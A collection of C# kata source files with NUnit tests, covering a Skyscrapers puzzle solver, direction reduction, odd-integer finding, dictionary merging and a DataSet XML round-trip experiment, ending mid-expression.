// private const int Size = Skyscrapers.Size;
// [Test]
// public void SolveSkyscrapers1()
// {
// var clues = new[]{
// 2, 2, 1, 3,
// 2, 2, 3, 1,
// 1, 2, 2, 3,
// 3, 2, 1, 3};
// var expected = new []{ new []{1, 3, 4, 2},
// new []{4, 2, 1, 3},
// new []{3, 4, 2, 1},
// new []{2, 1, 3, 4 }};
// Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
// .Select(clueIndex => new Tuple<int, int[]>(clueIndex, Skyscrapers.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
// .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
// var actual = Skyscrapers.SolvePuzzle(clues);
// CollectionAssert.AreEqual(expected, actual,
// ErrorMessage(expected, actual, orderedClues)
// );
// }
// [Test]
// public void SolveSkyscrapers2()
// {
// var clues = new[]{
// 0, 0, 1, 2,
// 0, 2, 0, 0,
// 0, 3, 0, 0,
// 0, 1, 0, 0};
// var expected = new []{ new []{2, 1, 4, 3},
// new []{3, 4, 1, 2},
// new []{4, 2, 3, 1},
// new []{1, 3, 2, 4}};
// Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
// .Select(clueIndex => new Tuple<int, int[]>(clueIndex, Skyscrapers.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
// .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
// var actual = Skyscrapers.SolvePuzzle(clues);
// CollectionAssert.AreEqual(expected, actual,
// ErrorMessage(expected, actual, orderedClues)
// );
// }
// [Test]
// public void SolveSkyscrapers3()
// {
// var clues = new[]{
// 1, 2, 4, 2,
// 2, 1, 3, 2,
// 3, 1, 2, 3,
// 3, 2, 2, 1};
// var expected = new []{
// new []{ 4, 2, 1, 3},
// new []{ 3, 1, 2, 4},
// new []{ 1, 4, 3, 2},
// new []{ 2, 3, 4, 1}};
// Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
// .Select(clueIndex => new Tuple<int, int[]>(clueIndex, Skyscrapers.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
// .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
// var actual = Skyscrapers.SolvePuzzle(clues);
// CollectionAssert.AreEqual(expected, actual,
// ErrorMessage(expected, actual, orderedClues)
// );
// }
// [Test]
// public void SolveSkyscrapers4()
// {
// var clues = new[]{
// 2, 2, 1, 3,
// 2, 2, 3, 1,
// 1, 2, 2, 3,
// 3, 2, 1, 3};
// var expected = new []{
// new []{ 1, 3, 4, 2},
// new []{ 4, 2, 1, 3},
// new []{ 3, 4, 2, 1},
// new []{ 2, 1, 3, 4}};
// Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
// .Select(clueIndex => new Tuple<int, int[]>(clueIndex, Skyscrapers.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
// .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
// var actual = Skyscrapers.SolvePuzzle(clues);
// CollectionAssert.AreEqual(expected, actual,
// ErrorMessage(expected, actual, orderedClues)
// );
// }
// [Test]
// public void SolveSkyscrapers5()
// {
// var clues = new[]{
// 0, 2, 0, 0,
// 0, 3, 0, 0,
// 0, 1, 0, 0,
// 0, 0, 1, 2};
// var expected = new []{
// new []{ 3, 2, 1, 4},
// new []{ 4, 1, 3, 2},
// new []{ 1, 4, 2, 3},
// new []{ 2, 3, 4, 1}};
// Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
// .Select(clueIndex => new Tuple<int, int[]>(clueIndex, Skyscrapers.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
// .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
// var actual = Skyscrapers.SolvePuzzle(clues);
// CollectionAssert.AreEqual(expected, actual,
// ErrorMessage(expected, actual, orderedClues)
// );
// }
// [Test]
// public void SolveSkyscrapers6()
// {
// var clues = new[]{
// 2, 2, 3, 1,
// 1, 2, 2, 3,
// 3, 2, 1, 3,
// 2, 2, 1, 3};
// var expected = new []{
// new []{ 2, 3, 1, 4},
// new []{ 4, 1, 2, 3},
// new []{ 3, 2, 4, 1},
// new []{ 1, 4, 3, 2}};
// Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
// .Select(clueIndex => new Tuple<int, int[]>(clueIndex, Skyscrapers.GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
// .ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
// var actual = Skyscrapers.SolvePuzzle(clues);
// CollectionAssert.AreEqual(expected, actual,
// ErrorMessage(expected, actual, orderedClues)
// );
// }
// private static string ErrorMessage(int[][] expected, int [][] actual, Stack<int> orderedClues)
// {
// return Environment.NewLine
// + string.Join(Environment.NewLine, expected.Select(r => string.Join("|", r)))
// + Environment.NewLine + Environment.NewLine
// + " "+ string.Join(" " , Enumerable.Range(0,4).Select(i=> orderedClues.Pop())) + Environment.NewLine
// + string.Join(Environment.NewLine, Skyscrapers.AllCells.Select(r => orderedClues.Pop() + " |" + string.Join("|", r.Select(c => c.PossibleValues.Count==1 ? c.PossibleValues.FirstOrDefault(v=>v!=0).ToString() : " ")) + "| " + orderedClues.Pop())) + Environment.NewLine
// + " " + string.Join(" ", Enumerable.Range(0, 4).Select(i => orderedClues.Pop())) + Environment.NewLine
// + Environment.NewLine + Skyscrapers.PrintValues()
// + Environment.NewLine + "Difference index: " + DifferenceIndex(expected, actual)
// + Environment.NewLine ;
// }
// private static string DifferenceIndex(int[][] expected, int[][] actual)
// {
// for (int i = 0; i < Skyscrapers.Size; i++)
// {
// for (int j = 0; j < Size; j++)
// {
// if (expected[i][j] != actual[i][j]) return i + "," + j;
// }
// }
// return string.Empty;
// }
// }
//}
<file_sep>/ConsoleApplication1/ConsoleApplication1/DatasetTrials.cs
using System;
using System.Data;
using System.Globalization;
using System.IO;
using System.Linq;
using NUnit.Framework;
namespace ConsoleApplication1
{
public static class DatasetTrials
{
public static void WriteToDataset()
{
Console.WriteLine(CultureInfo.CurrentCulture);
Console.WriteLine();
Console.WriteLine();
DataSet dataSet = new DataSet();
dataSet.Locale = new CultureInfo("de-DE");
DataTable dataTable = new DataTable("abcd");
dataSet.Tables.Add(dataTable);
dataTable.Columns.Add(new DataColumn("Col1", typeof(string)));
dataTable.Rows.Add(100000000.12345678911);
//dataTable.Rows.Add("2,5");
dataTable.Rows.Add(DBNull.Value);
//dataTable.AcceptChanges();
dataSet.AcceptChanges();
dataSet.WriteXml("d:\\temp\\myfile21431.txt", XmlWriteMode.WriteSchema);
Console.Write(dataSet.GetXml());
Console.WriteLine();
Console.WriteLine();
Console.WriteLine("***************Schema*************");
Console.WriteLine();
Console.Write(dataSet.GetXmlSchema());
DataSet dataSet1 = new DataSet();
dataSet1.ReadXml("d:\\temp\\myfile21431.txt");
Console.WriteLine();
Console.WriteLine();
Console.Write(dataSet1.GetXml());
}
}
[TestFixture]
public class TestDatasetTrials
{
[Test]
public void SimpleUnitNameTests()
{
DatasetTrials.WriteToDataset();
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/DirectionsReduction.cs
using System.Collections.Generic;
using System.Linq;
using NUnit.Framework;
namespace ConsoleApplication1
{
public class DirReduction
{
public static string[] dirReduc(string[] arr)
{
var stack = new Stack<string>();
stack.Push(string.Empty);
stack = arr.Aggregate(stack, (dirStack, currDir) =>
{
if (TryDirReduc(currDir, dirStack.Peek())) dirStack.Pop();
else dirStack.Push(currDir);
return dirStack;
});
var list = stack.Reverse().ToList();
list.RemoveAt(0);
return list.ToArray();
}
private static bool TryDirReduc(string currDir, string prevDir)
{
if (prevDir == "NORTH" && currDir == "SOUTH") return true;
if (prevDir == "SOUTH" && currDir == "NORTH") return true;
if (prevDir == "EAST" && currDir == "WEST") return true;
if (prevDir == "WEST" && currDir == "EAST") return true;
return false;
}
}
[TestFixture]
public class DirReductionTests
{
[Test]
public void Test1()
{
string[] a = new string[] { "NORTH", "SOUTH", "SOUTH", "EAST", "WEST", "NORTH", "WEST" };
string[] b = new string[] { "WEST" };
Assert.AreEqual(b, DirReduction.dirReduc(a));
}
[Test]
public void Test2()
{
string[] a = new string[] { "NORTH", "WEST", "SOUTH", "EAST" };
string[] b = new string[] { "NORTH", "WEST", "SOUTH", "EAST" };
Assert.AreEqual(b, DirReduction.dirReduc(a));
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/FindTheOddInt.cs
using System.Collections.Generic;
using System.Linq;
using NUnit.Framework;
namespace ConsoleApplication1
{
class FindTheOddInt
{
public static int find_it(int[] seq)
{
HashSet<int> intOddSet = new HashSet<int>();
foreach (int i in seq)
{
if (!intOddSet.Remove(i)) intOddSet.Add(i);
}
return intOddSet.First();
}
[Test]
public void Tests()
{
Assert.AreEqual(5, find_it(new[] { 20, 1, -1, 2, -2, 3, 3, 5, 5, 1, 2, 4, 20, 4, -1, -2, 5 }));
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/DictionaryMerge.cs
using NUnit.Framework;
using System.Collections.Generic;
using System.Linq;
namespace DictionaryMergerKata
{
public sealed class DictionaryMerger
{
public static Dictionary<TKey, TValue[]> Merge<TKey, TValue>(params Dictionary<TKey, TValue>[] dicts)
{
return dicts
.SelectMany(p => p)
.GroupBy(p => p.Key, p => p.Value)
.ToDictionary(g => g.Key, g => g.ToArray());
}
}
[TestFixture]
public class AccountTest
{
[Test]
public void Merge_EmptyDictionaries_Returns_Empty_Dictionary()
{
var empty1 = new Dictionary<string, int>();
var empty2 = new Dictionary<string, int>();
var empty3 = new Dictionary<string, int>();
Assert.IsEmpty(DictionaryMerger.Merge(empty1), "Single empty dictionary should create an empty dictionary");
Assert.IsEmpty(DictionaryMerger.Merge(empty1, empty2), "Two empty dictionaries should create an empty dictionary");
Assert.IsEmpty(DictionaryMerger.Merge(empty1, empty2, empty3), "Multiple empty dictionaries should create an empty dictionary");
}
[Test]
public void Merge_Single_Dictionary_Returns_Dictionary_With_Same_Content()
{
var original = new Dictionary<string, int> { { "A", 1 }, { "B", 2 }, { "C", 3 } };
var merged = DictionaryMerger.Merge(original);
var expected = new Dictionary<string, int[]> { { "A", new[] { 1 } }, { "B", new[] { 2 } }, { "C", new[] { 3 } } };
Compare(merged, expected);
}
[Test]
public void Merge_Two_Simple_Dictionaries_Returns_Combined_Dictionary()
{
var original1 = new Dictionary<string, int> { { "A", 1 } };
var original2 = new Dictionary<string, int> { { "B", 2 } };
var merged = DictionaryMerger.Merge(original1, original2);
var expected = new Dictionary<string, int[]> { { "A", new[] { 1 } }, { "B", new[] { 2 } } };
Compare(merged, expected);
}
[Test]
public void Merge_Two_Dictionaries_With_Multiple_Values_Returns_Combined_Dictionary()
{
var original1 = new Dictionary<string, int> { { "A", 1 }, { "B", 2 }, { "C", 3 } };
var original2 = new Dictionary<string, int> { { "A", 4 }, { "D", 5 } };
var merged = DictionaryMerger.Merge(original1, original2);
var expected = new Dictionary<string, int[]> { { "A", new[] { 1, 4 } }, { "B", new[] { 2 } }, { "C", new[] { 3 } }, { "D", new[] { 5 } } };
Compare(merged, expected);
}
private void Compare<TKey, TValue>(Dictionary<TKey, TValue[]> actual, Dictionary<TKey, TValue[]> expected)
{
Assert.AreEqual(expected.Count, actual.Count, "The dictionary does not contain the expected number of elements");
foreach (var actualPair in actual)
{
TValue[] expectedValue;
if (!expected.TryGetValue(actualPair.Key, out expectedValue))
{
Assert.Fail("The result dictionary does not contain all required keys");
}
CollectionAssert.AreEquivalent(expectedValue, actualPair.Value, "The values in the dictionary are not matching");
}
}
}
}<file_sep>/ConsoleApplication1/ConsoleApplication1/Skyscrapers.cs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using Castle.Core.Internal;
using NUnit.Framework;
namespace ConsoleApplication1
{
class Skyscrapers
{
public const int Size = 7;
private static bool _processingClues;
public static Cell[][] AllCells;
private static Lane[] AllLanes;
internal class Cell
{
public int X;
public int Y;
public readonly List<int> PossibleValues;
public int ValueSet;
public Cell(int x, int y)
{
X = x;
Y = y;
PossibleValues = new List<int>(Enumerable.Range(1, Size));
}
public Cell(Cell cell)
{
X = cell.X;
Y = cell.Y;
PossibleValues = new List<int>(cell.PossibleValues);
ValueSet = cell.ValueSet;
}
public Result RemoveValue(int value)
{
if (!PossibleValues.Remove(value)) return Result.NoChange;
if (PossibleValues.Count == 0) return Result.Failed;
if (PossibleValues.Count == 1)
{
if (Result.Failed == (SetCellValue(PossibleValues.First()) & Result.Failed)) return Result.Failed;
}
if (EliminateValuesSingle(value) == Result.Failed) return Result.Failed;
return Result.Changed;
}
private Result EliminateValuesSingle(int value)
{
Result result = Result.NoChange;
//Iterate over column and find if this value is present only in one cell then set value for that cell.
Cell uniqueCell = null;
for (int x = 0, y = Y; x < Size; x++)
{
Cell currCell = AllCells[x][y];
if (currCell.PossibleValues.Contains(value))
{
if (uniqueCell != null)
{
uniqueCell = null;
break;
}
uniqueCell = currCell;
}
}
if(uniqueCell != null) result = uniqueCell.SetCellValue(value);
if( result == Result.Failed) return Result.Failed;
//Iterate over rows
uniqueCell = null;
for (int x = X, y = 0; y < Size; y++)
{
Cell currCell = AllCells[x][y];
if (currCell.PossibleValues.Contains(value))
{
if (uniqueCell != null)
{
uniqueCell = null;
break;
}
uniqueCell = currCell;
}
}
if(uniqueCell != null) result = uniqueCell.SetCellValue(value);
return result;
}
public Result SetCellValue(int value)
{
if (ValueSet != 0) return Result.NoChange;
ValueSet = value;
List<int> toBeRemoved = PossibleValues.Where(v => v != value).ToList();
if(toBeRemoved.Any(v => RemoveValue(v) == Result.Failed)) return Result.Failed;
for (int i = 0; i < Size; i++)
{
if (i == Y) continue;
if(GetCell(X, i).RemoveValue(value) == Result.Failed) return Result.Failed;
}
for (int i = 0; i < Size; i++)
{
if (i == X) continue;
if(GetCell(i, Y).RemoveValue(value) == Result.Failed) return Result.Failed;
}
if (!_processingClues) return Result.Changed;
foreach (int laneIndex in GetLanesContainingCell(this))
{
Lane lane = AllLanes[laneIndex];
if (lane.Clue == 0) continue;
for (var i = lane.Cells.Count - 1; i >= 0; i--)
{
Cell cell = lane.Cells[i];
if(cell.ValueSet == 0) break;
lane.Cells.RemoveAt(i);
if (!lane.Cells.Any()) lane.Clue = 0;
else if (cell.ValueSet >= lane.Cells.Select(c => c.PossibleValues.Max()).Max()) lane.Clue--;
}
}
return Result.Changed;
}
public void CopyFrom(Cell cell)
{
PossibleValues.Clear();
PossibleValues.AddRange(cell.PossibleValues);
ValueSet = cell.ValueSet;
}
}
internal class Lane
{
public int Clue;
public readonly List<Cell> Cells;
public Lane(int clue, int index)
{
Clue = clue;
Cells = GetLaneCells(index);
}
public Lane(Lane lane)
{
Clue = lane.Clue;
Cells = new List<Cell>(lane.Cells);
}
private static List<Cell> GetLaneCells(int index)
{
List<Cell> laneCells = new List<Cell>(Size);
if (index < Size)
{
for (var i = 0; i < Size; i++)
{
laneCells.Add(GetCell(i, index));
}
}
else if (index < 2 * Size)
{
for (var i = 0; i < Size; i++)
{
laneCells.Add(GetCell(index - Size, Size - i - 1));
}
}
else if (index < 3 * Size)
{
for (var i = 0; i < Size; i++)
{
laneCells.Add(GetCell(Size - i - 1, 3 * Size - index - 1));
}
}
else
{
for (var i = 0; i < Size; i++)
{
laneCells.Add(GetCell(4 * Size - index - 1, i));
}
}
return laneCells;
}
public override string ToString()
{
return Clue + "," + Cells.Count;
}
public string FirstIndices()
{
if (Cells.Any()) return Cells.First().X + "," + Cells.First().Y;
return "S00";
}
public Lane GetOppositeLane()
{
if(Cells.Count < 2) throw new InvalidOperationException("Call this method only if there are more than two cells in a lane");
if (Cells[0].X == Cells[1].X)
{
if(Cells[0].Y > Cells[1].Y)
return AllLanes[4 * Size - Cells[0].X - 1];
return AllLanes[Size + Cells[0].X];
}
else
{
if(Cells[0].X < Cells[1].X)
return AllLanes[3 * Size - Cells[0].Y - 1];
return AllLanes[Cells[0].Y];
}
}
}
internal class Backup
{
public readonly Cell[][] _allCells;
public readonly Lane[] _allLanes;
public Backup()
{
_allCells = new Cell[Size][];
for (var i = 0; i < Size; i++)
{
_allCells[i] = new Cell[Size];
for (int j = 0; j < Size; j++)
{
_allCells[i][j] = new Cell(AllCells[i][j]);
}
}
_allLanes = new Lane[4*Size];
for (var i = 0; i < _allLanes.Length; i++)
{
_allLanes[i] = new Lane(AllLanes[i]);
}
}
public void Restore()
{
for (var i = 0; i < Size; i++)
{
for (var j = 0; j < Size; j++)
{
AllCells[i][j].CopyFrom(_allCells[i][j]);
}
}
AllLanes = _allLanes;
AllLanes = new Lane[4*Size];
for (var i = 0; i < _allLanes.Length; i++)
{
AllLanes[i] = new Lane(_allLanes[i]);
}
}
}
public static int[][] Expected { get; set; }
public static int[][] SolvePuzzle(int[] clues)
{
AllCells = new Cell[Size][];
for (var i = 0; i < Size; i++)
{
AllCells[i] = new Cell[Size];
for (var j = 0; j < Size; j++)
{
AllCells[i][j] = new Cell(i, j);
}
}
AllLanes = new Lane[4 * Size];
for (var i = 0; i < clues.Length; i++)
{
AllLanes[i] = new Lane(clues[i], i);
}
_processingClues = true;
if(Result.Failed == (ProcessClues() & Result.Failed)) return null;
//_processingClues = false;
if (!PuzzleSolved())
{
FindChoicesAndEliminate(clues);
}
int[][] grid = new int[Size][];
for (var rowIndex = 0; rowIndex < Size; rowIndex++)
{
grid[rowIndex] = new int[Size];
for (var colIndex = 0; colIndex < Size; colIndex++)
{
grid[rowIndex][colIndex] = AllCells[rowIndex][colIndex].PossibleValues.Aggregate((a, b) => a + b);
}
}
return grid;
}
private static bool FindChoicesAndEliminate(int[] clues)
{
Backup backup = new Backup();
foreach (Cell cell in GetChoices(out int valueToEliminate))
{
if (Result.Failed == (cell.RemoveValue(valueToEliminate) & Result.Failed))
{
backup.Restore();
continue;
}
bool puzzleSolved = PuzzleSolved();
if (!puzzleSolved)
{
if (Result.Failed == (ProcessClues() & Result.Failed))
{
backup.Restore();
continue;
}
puzzleSolved = PuzzleSolved();
}
if (puzzleSolved)
{
if (ValidateClues(clues))
{
return true;
}
backup.Restore();
}
else
{
if (FindChoicesAndEliminate(clues)) return true;
backup.Restore();
}
}
return false;
}
private static bool ValidateClues(int[] clues)
{
for (var i = 0; i < clues.Length; i++)
{
if(clues[i] == 0) continue;
Lane lane = new Lane(clues[i], i);
int numberOfVisible = 0;
int highestNumber = 0;
foreach (Cell cell in lane.Cells)
{
if (cell.ValueSet > highestNumber)
{
numberOfVisible++;
highestNumber = cell.ValueSet;
}
}
if (numberOfVisible != clues[i]) return false;
}
return true;
}
private static bool PuzzleSolved()
{
return !AllCells.Any(r => r.Any(c => c.ValueSet == 0));
}
private static Cell[] GetChoices(out int valueToEliminate)
{
SortedDictionary<int, Tuple<int, Cell[]>> options = new SortedDictionary<int, Tuple<int, Cell[]>>();
foreach (Lane lane in AllLanes)
{
foreach (int value in Enumerable.Range(1, Size))
{
Cell[] possibleCells = lane.Cells.Where(c => c.PossibleValues.Contains(value)).ToArray();
if (possibleCells.Length == 2)
{
valueToEliminate = value;
return possibleCells.ToArray();
}
if (possibleCells.Length > 2 && !options.ContainsKey(possibleCells.Length))
{
options[possibleCells.Length] = new Tuple<int, Cell[]>(value, possibleCells);
}
}
}
valueToEliminate = 0;
if(!options.Any()) return new Cell[0];
var firstOption = options.First();
valueToEliminate = firstOption.Value.Item1;
return firstOption.Value.Item2;
}
private static Result ProcessClues()
{
Result result = Result.Changed;
while (result == Result.Changed)
{
//Process clues
result = Result.NoChange;
for (var index = 0; index < AllLanes.Length; index++)
{
var lane = AllLanes[index];
result = ApplySimpleRules(lane) | result;
if (Result.Failed == (result & Result.Failed)) return Result.Failed;
}
}
result = Result.Changed;
while (result == Result.Changed)
{
//Process clues
result = Result.NoChange;
for (var index = 0; index < AllLanes.Length; index++)
{
var lane = AllLanes[index];
result = ApplySpecialRules(lane) | result;
if (Result.Failed == (result & Result.Failed)) return Result.Failed;
}
}
return result;
}
private static Result ApplySpecialRules(Lane lane)
{
if (lane.Cells.Count < 3) return Result.NoChange;
int visible = 0;
int highestHeight = 0;
var i = 0;
for (; i < lane.Cells.Count; i++)
{
Cell cell = lane.Cells[i];
if (cell.ValueSet == 0) break;
if (cell.ValueSet > highestHeight)
{
highestHeight = cell.ValueSet;
visible++;
}
}
int max = lane.Cells.Select(c => c.PossibleValues.Max()).Max();
if (highestHeight == max) return Result.NoChange;
int maxIndex = lane.Cells.FindIndex(i, c => c.ValueSet == max);
Result result = Result.NoChange;
if (lane.Clue - visible - 1 == maxIndex - i)
{
for (int j = i; j < maxIndex; j++)
{
int[] valuesToBeRemoved = lane.Cells[j].PossibleValues.Where(p => p < highestHeight).ToArray();
foreach (var v in valuesToBeRemoved)
{
int cellsCount = lane.Cells.Count;
result = lane.Cells[j].RemoveValue(v) | result;
if (Result.Failed == (result & Result.Failed)) return Result.Failed;
if (cellsCount != lane.Cells.Count) return result;
}
}
}
return result;
}
private static Result ApplySimpleRules(Lane lane)
{
int clue = lane.Clue;
int size = lane.Cells.Count;
if (clue == 0) return Result.NoChange;
Result result = Result.NoChange;
if (clue == 1)
{
return lane.Cells[0].SetCellValue(lane.Cells[0].PossibleValues.Max());
}
if (clue == size)
{
for (int i = 0; i < size; i++)
{
Cell cell = lane.Cells.ElementAtOrDefault(i);
if (cell != null)
{
result = cell.SetCellValue(cell.PossibleValues.Min()) | result;
if (Result.Failed == (result & Result.Failed)) return Result.Failed;
}
}
return result;
}
List<int> possibleValuesInLane = lane.Cells.SelectMany(c => c.PossibleValues).Distinct().ToList();
if (possibleValuesInLane.Count != size) return Result.Failed;
possibleValuesInLane.Sort();
if (clue == 2 && size > 1)
{
result = lane.Cells[1].RemoveValue(possibleValuesInLane[size - 2]);
if (Result.Failed == result) return Result.Failed;
}
for (int indexToBeRemoved = size; indexToBeRemoved > size - clue + 1; indexToBeRemoved--)
{
for (int i = 0; i < clue + indexToBeRemoved - size - 1; i++)
{
Cell cell = lane.Cells.ElementAtOrDefault(i);
if (cell != null)
{
int cellCount = lane.Cells.Count;
result = cell.RemoveValue(possibleValuesInLane[indexToBeRemoved-1]) | result;
if (Result.Failed == (result & Result.Failed)) return Result.Failed;
if (cellCount != lane.Cells.Count) return result;
}
}
}
return result;
}
private static int[] GetLanesContainingCell(Cell cell)
{
return new[] { cell.Y, cell.X + Size, 3 * Size - cell.Y - 1, 4 * Size - cell.X - 1 };
}
private static Cell GetCell(int x, int y)
{
return AllCells[x][y];
}
public static string PrintValues(Backup backup = null)
{
Lane[] allLanes = AllLanes;
Cell[][] allCells = AllCells;
if (backup != null)
{
allLanes = backup._allLanes;
allCells = backup._allCells;
}
Stack<Lane> orderedClues = new Stack<Lane>(Enumerable.Range(0, 4 * Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, SkyscrapersTests4by4.GetLaneIndices2(clueIndex)))
.OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => allLanes[t.Item1]).Reverse());
string values = Environment.NewLine
+ " " +
string.Join(string.Concat(Enumerable.Range(0,2*Size-2).Select(i => " ")),
Enumerable.Range(0, Size).Select(i => orderedClues.Pop())) +
Environment.NewLine
+ string.Join(Environment.NewLine,
allCells.Select(r =>
orderedClues.Pop() + " |" +
string.Join("|", r.Select(c => string.Join(",", c.PossibleValues) + string.Concat(Enumerable.Range(0, Size - c.PossibleValues.Count).Select(i => " ")))) + "| " +
orderedClues.Pop())) + Environment.NewLine
+ " " +
string.Join(string.Concat(Enumerable.Range(0,2*Size-2).Select(i => " ")),
Enumerable.Range(0, Size).Select(i => orderedClues.Pop())) +
Environment.NewLine;
Debug.Print(values);
Console.Write(values);
return values;
}
}
[Flags]
internal enum Result
{
NoChange = 0,
Changed = 1,
Failed = 2
}
[TestFixture]
public class SkyscrapersTests4by4
{
private const int Size = Skyscrapers.Size;
public static int[] GetLaneIndices2(int clueIndex)
{
if (clueIndex < Skyscrapers.Size)
{
return new[] { -1, clueIndex };
}
if (clueIndex < 2 * Skyscrapers.Size)
{
return new[] { clueIndex - Skyscrapers.Size, 1 };
}
if (clueIndex < 3 * Skyscrapers.Size)
{
return new[] { Skyscrapers.Size, 3 * Skyscrapers.Size - clueIndex - 1 };
}
return new[] { 4 * Skyscrapers.Size - clueIndex - 1, 0 };
}
[Test]
public void SolveSkyscrapers1()
{
var clues = new[]{
2, 2, 1, 3,
2, 2, 3, 1,
1, 2, 2, 3,
3, 2, 1, 3};
var expected = new[]{ new []{1, 3, 4, 2},
new []{4, 2, 1, 3},
new []{3, 4, 2, 1},
new []{2, 1, 3, 4 }};
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues);
CollectionAssert.AreEqual(expected, actual,
ErrorMessage(expected, actual, orderedClues)
);
}
[Test]
public void SolveSkyscrapers2()
{
var clues = new[]{
0, 0, 1, 2,
0, 2, 0, 0,
0, 3, 0, 0,
0, 1, 0, 0};
var expected = new[]{ new []{2, 1, 4, 3},
new []{3, 4, 1, 2},
new []{4, 2, 3, 1},
new []{1, 3, 2, 4}};
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues);
CollectionAssert.AreEqual(expected, actual,
ErrorMessage(expected, actual, orderedClues)
);
}
[Test]
public void SolveSkyscrapers3()
{
var clues = new[]{
1, 2, 4, 2,
2, 1, 3, 2,
3, 1, 2, 3,
3, 2, 2, 1};
var expected = new[]{
new []{ 4, 2, 1, 3},
new []{ 3, 1, 2, 4},
new []{ 1, 4, 3, 2},
new []{ 2, 3, 4, 1}};
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues);
CollectionAssert.AreEqual(expected, actual,
ErrorMessage(expected, actual, orderedClues)
);
}
[Test]
public void SolveSkyscrapers4()
{
var clues = new[]{
2, 2, 1, 3,
2, 2, 3, 1,
1, 2, 2, 3,
3, 2, 1, 3};
var expected = new[]{
new []{ 1, 3, 4, 2},
new []{ 4, 2, 1, 3},
new []{ 3, 4, 2, 1},
new []{ 2, 1, 3, 4}};
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues);
CollectionAssert.AreEqual(expected, actual,
ErrorMessage(expected, actual, orderedClues)
);
}
[Test]
public void SolveSkyscrapers5()
{
var clues = new[]{
0, 2, 0, 0,
0, 3, 0, 0,
0, 1, 0, 0,
0, 0, 1, 2};
var expected = new[]{
new []{ 3, 2, 1, 4},
new []{ 4, 1, 3, 2},
new []{ 1, 4, 2, 3},
new []{ 2, 3, 4, 1}};
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues);
CollectionAssert.AreEqual(expected, actual,
ErrorMessage(expected, actual, orderedClues)
);
}
[Test]
public void SolveSkyscrapers6()
{
var clues = new[]{
2, 2, 3, 1,
1, 2, 2, 3,
3, 2, 1, 3,
2, 2, 1, 3};
var expected = new[]{
new []{ 2, 3, 1, 4},
new []{ 4, 1, 2, 3},
new []{ 3, 2, 4, 1},
new []{ 1, 4, 3, 2}};
Stack<int> orderedClues = new Stack<int>(Enumerable.Range(0, 4 * Skyscrapers.Size)
.Select(clueIndex => new Tuple<int, int[]>(clueIndex, GetLaneIndices2(clueIndex))).OrderBy(t => t.Item2[0])
.ThenBy(t => t.Item2[1]).Select(t => clues[t.Item1]).Reverse());
var actual = Skyscrapers.SolvePuzzle(clues);
CollectionAssert.AreEqual(expected, actual,
ErrorMessage(expected, actual, orderedClues)
);
}
public static string ErrorMessage(int[][] expected, int[][] actual, Stack<int> orderedClues)
{
return Environment.NewLine
+ String.Join(Environment.NewLine, expected.Select(r => String.Join("|", r)))
+ Environment.NewLine + Environment.NewLine
+ " " + String.Join(" ", Enumerable.Range(0, Size).Select(i => orderedClues.Pop())) + Environment.NewLine
+ String.Join(Environment.NewLine, Skyscrapers.AllCells.Select(r => orderedClues.Pop() + " |" + String.Join("|", r.Select(c => c.PossibleValues.Count == 1 ? c.PossibleValues.First() == expected[c.X][c.Y] ? c.PossibleValues.First() + " " : c.PossibleValues.First() + "*" : " *")) + "| " + orderedClues.Pop())) + Environment.NewLine
